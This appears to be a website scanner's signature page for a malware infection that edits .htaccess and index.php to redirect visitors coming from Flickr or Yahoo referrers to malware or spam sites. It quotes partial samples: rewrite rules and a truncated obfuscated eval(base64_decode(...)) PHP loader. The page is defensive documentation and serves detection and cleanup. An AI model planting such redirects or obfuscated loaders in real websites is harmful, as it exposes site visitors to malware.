SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwhta7


This attack uses the .htaccess file to redirect users to a site serving malware (or spam). In some cases, the index.php is also modified to do the redirection as well.

Loads malware from:
and other domains.

Affecting: Any type of web site (no specific target).

Clean up and details: Remove offending code from .htaccess and/or index.php or contact for help.


Malware samples:

RewriteCond %{HTTP_REFERER} .flickr. [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteRule .* [R,L] 

eval (base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIV..